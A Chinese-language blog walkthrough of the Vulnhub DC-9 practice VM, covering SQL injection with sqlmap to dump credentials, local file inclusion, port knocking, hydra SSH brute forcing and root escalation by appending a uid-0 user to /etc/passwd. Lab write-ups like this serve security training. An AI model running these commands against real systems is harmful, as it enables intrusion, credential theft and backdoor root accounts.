• Vulnhub-靶机-DC: 9


    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现

    地址:https://www.vulnhub.com/entry/dc-9,412/

    nmap -n -p- -A 192.168.226.5 -o dc9.nmap

    nmap扫描结果

    访问web页面

    可能存在SQL注入,直接将burpsuite抓包保存为dc9.seq 然后使用sqlmap -r参数跑一下,确认存在SQL注入漏洞,最终跑出数据库的一个admin账号和md5加密的值

    sqlmap -r dc9.seq -D Staff -T Users -C UserID,Username,Password --dump-all --batch 

    解密md5值

    登录进去显示用户不存在

    这里是要通过fuzz批量测试存在哪些配置文件,而且要猜测是否存LFI漏洞,爆破一段时间,确认存在/etc/knockd.conf

    要使用knock进行敲击开启ssh端口

    确认成功knock并开启了ssh端口,然后根据上面注入漏洞注入出来的用户名和密码使用hydra进行爆破ssh

     sqlmap -r dc9.seq -D users -T UserDetails -C id,password,firstname,lastname,reg_date,username --dump-all --batch

    将注入出来的用户名和密码使用awk分割出来用户名username.txt和password.txt通过hydra进行暴力破解

    cat userpass.txt | awk -F ',' '{print $4}' > username.txt
    cat userpass.txt | awk -F ',' '{print $NF}' > password.txt

    最终通过hydra破解出来如下:

    使用上面的3个用户登录到目标靶机,最终通过用户janitor得到如下敏感信息

    将上述得到的密码再次追加到上述破解的密码字典中,再次使用hydra进行暴力破解

    确认多出了一个用户fredf,使用su切换过去,执行了下sudo -l发现可以同如下图所示进行提权

    根据显示的test文件,执行了file命令确认是二进制可执行文件,执行之后发现是

    find / -name "test.py" 2>/dev/null

    代码大概意思就是执行了读取了第一个位置的文件,然后将读取的文件内容写入到第二个文件中,可以通过追加passwd文件进行提权

    echo 'bmfx:$1$bmfx$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> passwd

    切换root用户

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    第十二周作业
    第十一周作业
    第十周作业
    第九周作业*
    #**第八周作业+预习作业**
    第七周作业
    Linux 日志查看常用命令
    Linux tar命令
    Java 数组
    设计模式 观察者模式(Observer)
  • 原文地址:https://www.cnblogs.com/autopwn/p/13793343.html
Copyright © 2020-2023  润新知